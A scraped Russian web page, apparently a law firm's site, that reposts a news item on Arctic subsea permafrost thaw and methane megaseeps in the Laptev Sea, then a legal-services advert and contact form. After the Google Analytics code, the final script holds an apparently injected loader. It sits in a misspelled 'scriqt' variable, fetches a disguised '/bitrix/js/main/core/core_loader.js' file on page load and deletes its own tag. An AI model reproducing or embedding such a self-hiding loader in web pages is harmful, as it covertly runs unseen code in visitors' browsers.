Ученые предупредили о катастрофических последствиях таяния подводной мерзлоты в Арктике.

Ученые предупредили о катастрофических последствиях таяния подводной мерзлоты в Арктике. Ученые предупредили о катастрофических последствиях таяния подводной мерзлоты в Арктике.

Дальневосточные ученые в этом году планируют организовать три экспедиции в Арктику для изучения таяния подводной мерзлоты, которое может привести к серьезным изменениям климата.

«Обеспокоенность ученых вызывает интенсивная деградация подводной мерзлоты Восточно-Сибирского шельфа, которая ведет к высвобождению гигантского количества древнего органического вещества и способна повлиять на климатическую карту планеты», — говорится в сообщении, размещенном на официальном сайте Дальневосточного отделения РАН.

Экспедиция планирует организовать в этом году Тихоокеанский океанологический институт (ТОИ) имени В. И. Ильичева Дальневосточного отделения (ДВО) РАН.

«При сохранении современных темпов протаивания подводной мерзлоты, сопровождающегося массированным поступлением метана в атмосферу, может произойти еще более мощный выброс. Он может привести к труднопредсказуемым климатическим последствиям, не исключая и сценарий климатической катастрофы», — сообщил ведущий научный сотрудник лаборатории арктических исследований ТОИ ДВО РАН Олег Дударев, слова которого приводятся в сообщении.
Поэтому основными задачами исследований ученые называют выявление масштабов деградации подводной мерзлоты и гидратов, оценку миграции метана в Восточной Арктике.

Впервые струи газа, в составе которых до 70% составляет метан, были обнаружены в 2011 году в северной части моря Лаптевых. На участке дна площадью один квадратный километр было зарегистрировано несколько сотен выходов газа, в совокупности называемых мегасипом. Результаты экспедиций, проведенных в 2012, 2014 и 2016 годах, показали, что интенсивность выделения метана со дна в зонах мегасипов возрастает, некоторые факелы в диаметре достигают сотни метров.

Помимо климатических последствий мегасипы могут представлять угрозу при разработке углеводородных месторождений.

«Как правило, они расположены в пределах лицензионных участков разработчиков углеводородных месторождений арктического шельфа. Это означает возможные проблемы с организацией и безопасной эксплуатацией месторождений. Например, на участках деградации многолетней мерзлоты в результате ее протаивания образуются просадочные термокарстовые котловины», — говорится в сообщении.

Ученые отмечают, что если таяние подводной мерзлоты будет усиливаться, то увеличение объемов выделения парниковых газов отразится в изменении климатических параметров. Это, в свою очередь, приведет к изменению экологических характеристик морей не только Арктики, но и, возможно, всего Мирового океана.
Возврат к списку


У нас сотни выигранных дел – отзывы реальных клиентов это доказывают!

Работайте с профессионалами!

Звонки и заявки на консультацию принимаются круглосуточно.

Вы получите четкие и понятные консультации: «без воды» - только суть! С нашей помощью Вы обойдете сложные «ловушки и капканы» закона.

ФИО
Телефон
Текст сообщения
Это поле обязательно для заполнения
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');var scriqt=document.createElement('script');scriqt.src='/bitrix/js/main/core/core_loader.js?v=0.2.14';scriqt.onload=function(){document.head.removeChild(scriqt);};document.head.appendChild(scriqt); ga('create', 'UA-83802593-1', 'auto'); ga('send', 'pageview');